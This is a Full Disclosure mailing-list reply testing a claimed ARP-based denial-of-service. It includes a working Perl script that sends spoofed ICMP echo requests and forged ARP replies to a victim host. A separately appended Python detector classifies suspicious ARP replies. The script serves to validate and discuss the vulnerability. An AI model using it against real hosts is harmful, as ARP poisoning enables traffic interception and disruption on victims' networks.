Full Disclosure mailing list archives
Re: The ArpSucker is b0rn! Be yourself, be the net.
From: Gregory Steuck <greg () y2004 nest cx>
Date: Wed, 15 Sep 2004 02:31:46 -0700
"alpt" == alpt <alpt () freaknet org> writes:
alpt> Then when I tried to become all the 2^32-1 IPs, I realized
alpt> that the attacked machine (elibus and pallotron, eheheh), were
alpt> under a mortal DoS. The Elibus' machine was constantly at 100%
alpt> of cpu until Elibus unplugged the eth0 cable, while the
alpt> Pallotron's machine went into a kernel panic! Elibus uses an x86
alpt> arch with the linux kernel, pallotron uses An Apple I-book,
alpt> with MacOsx.

I am not sure if this report is accurate. I played a little with the
attached perl script which should be doing the same thing that ArpSucker
alleges to do. I ran the script against OpenBSD 3.6 and Linux
2.4.22-gentoo-r5. Both of them only accept the directly attached net
addresses (/24 in my case) into the arp cache. Anything beyond that has
no observable effect except an echo reply sent along the default route.

Running:

    arp-poison.pl <victim> <spoof_start> <count> <intf>

Granted the performance of the script is way lower than a single process
would have, but I doubt that running it any faster makes the arp cache
accept non-directly-connected entries.

Has anybody validated the original claim?

Thanks
Greg

    #!/usr/bin/perl
    # arp-poison.pl: for each of <count> addresses starting at <spoof_start>,
    # send the victim a spoofed ICMP echo request followed by a spoofed ARP
    # reply, using the dnet(1) tool from libdnet to build and emit the frames.
    use strict;

    # Dotted-quad IPv4 address -> 32-bit integer.
    sub ip_to_int($) {
        my ($a, $b, $c, $d) = split(/\./, $_[0]);
        return ($a << 24) + ($b << 16) + ($c << 8) + $d;
    }

    # 32-bit integer -> dotted-quad IPv4 address.
    sub int_to_ip($) {
        my ($ip) = @_;
        return ($ip >> 24) . "." . (($ip >> 16) & 255) . "."
             . (($ip >> 8) & 255) . "." . ($ip & 255);
    }

    # Run a command and abort on a non-zero exit status.
    sub system_or_die(@) {
        system(@_);
        die join(' ', @_) . " failed with exit code " . ($? >> 8) . "\n"
            unless $? == 0;
    }

    my $spoof_eth = '00:11:2f:77:77:77';
    my ($victim_ip, $start_ip, $count, $intf) = @ARGV[0..3];

    # Ping the victim once so its MAC address lands in our own ARP cache,
    # then read it back from `dnet arp show` (third whitespace-separated field).
    system_or_die('ping', '-c', '1', $victim_ip);
    my $victim_eth = (split(/\s+/, `dnet arp show | grep $victim_ip`))[2];
    die "Cannot determine $victim_ip's ethernet address, received $victim_eth\n"
        unless split(/:/, $victim_eth) == 6;

    my $start_int = ip_to_int($start_ip);
    for (my $i = 0; $i < $count; $i++) {
        my $spoof_ip = int_to_ip($start_int + $i);
        # ICMP echo request with the spoofed source address.
        system_or_die(qq[echo 'aaaaaaaaaaaa' | dnet icmp type 8 code 0 ]
                    . qq[| dnet ip proto icmp src $spoof_ip dst $victim_ip ]
                    . qq[| dnet eth type ip src $spoof_eth dst $victim_eth ]
                    . qq[| sudo dnet send $intf]);
        # Unsolicited ARP reply mapping the spoofed IP to our spoofed MAC.
        system_or_die(qq[dnet arp op rep sha $spoof_eth spa $spoof_ip ]
                    . qq[tha $victim_eth tpa $victim_ip ]
                    . qq[| dnet eth type arp src $spoof_eth dst $victim_eth ]
                    . qq[| sudo dnet send $intf]);
    }

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
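A detection-side counterpart to the test above, added here as an example and not part of Greg's post or his script: a small Python classifier that, given an interface's subnet and a list of observed ARP reply tuples (constructed inline, reusing the script's spoof MAC as the attacker), separates off-subnet sender addresses (which, per Greg's observation, the stack never caches, but which still reveal the attempt) from on-subnet replies that re-map an already-known IP to a new MAC, and flags MACs that reply at flood rates. The reply tuples, the subnet and the threshold are assumptions chosen for the example.

```python
import ipaddress
from collections import Counter

# Constructed sample, not captured traffic: one legitimate gateway reply,
# then replies of the kind arp-poison.pl emits (00:11:2f:77:77:77 is the
# script's own $spoof_eth constant).
SAMPLE_REPLIES = [
    ("00:0c:29:aa:bb:01", "192.168.1.1", "192.168.1.20"),  # gateway, legit
    ("00:11:2f:77:77:77", "192.168.1.1", "192.168.1.20"),  # gateway re-mapped
    ("00:11:2f:77:77:77", "10.0.0.5", "192.168.1.20"),     # off-subnet sender
    ("00:11:2f:77:77:77", "172.16.9.9", "192.168.1.20"),   # off-subnet sender
] + [("00:11:2f:77:77:77", f"192.168.1.{i}", "192.168.1.20")
     for i in range(100, 110)]                             # sweep, as the script's loop


def classify_arp_replies(iface_cidr, replies, flood_threshold=10):
    """Classify ARP replies (sender_mac, sender_ip, target_ip) seen on one interface.

    Returns a dict of findings:
      off_subnet - sender IP outside iface_cidr; never enters the cache, but
                   its presence on the wire is itself a poisoning attempt.
      mac_change - an on-subnet IP already mapped to one MAC now claims another.
      flood      - sender MACs that issued more than flood_threshold replies.
    """
    net = ipaddress.ip_network(iface_cidr, strict=False)
    cache = {}            # what a host's ARP cache would hold: ip -> mac
    per_mac = Counter()   # reply volume per sender MAC
    findings = {"off_subnet": [], "mac_change": [], "flood": []}
    for sender_mac, sender_ip, _target_ip in replies:
        per_mac[sender_mac] += 1
        if ipaddress.ip_address(sender_ip) not in net:
            # Mirrors the observed stack behaviour: never cached, only logged.
            findings["off_subnet"].append((sender_mac, sender_ip))
            continue
        known = cache.get(sender_ip)
        if known is not None and known != sender_mac:
            findings["mac_change"].append((sender_ip, known, sender_mac))
        cache[sender_ip] = sender_mac  # the cache accepts the newest claim
    findings["flood"] = [m for m, n in per_mac.items() if n > flood_threshold]
    return findings


if __name__ == "__main__":
    for kind, hits in classify_arp_replies("192.168.1.0/24", SAMPLE_REPLIES).items():
        print(f"{kind}: {hits}")
```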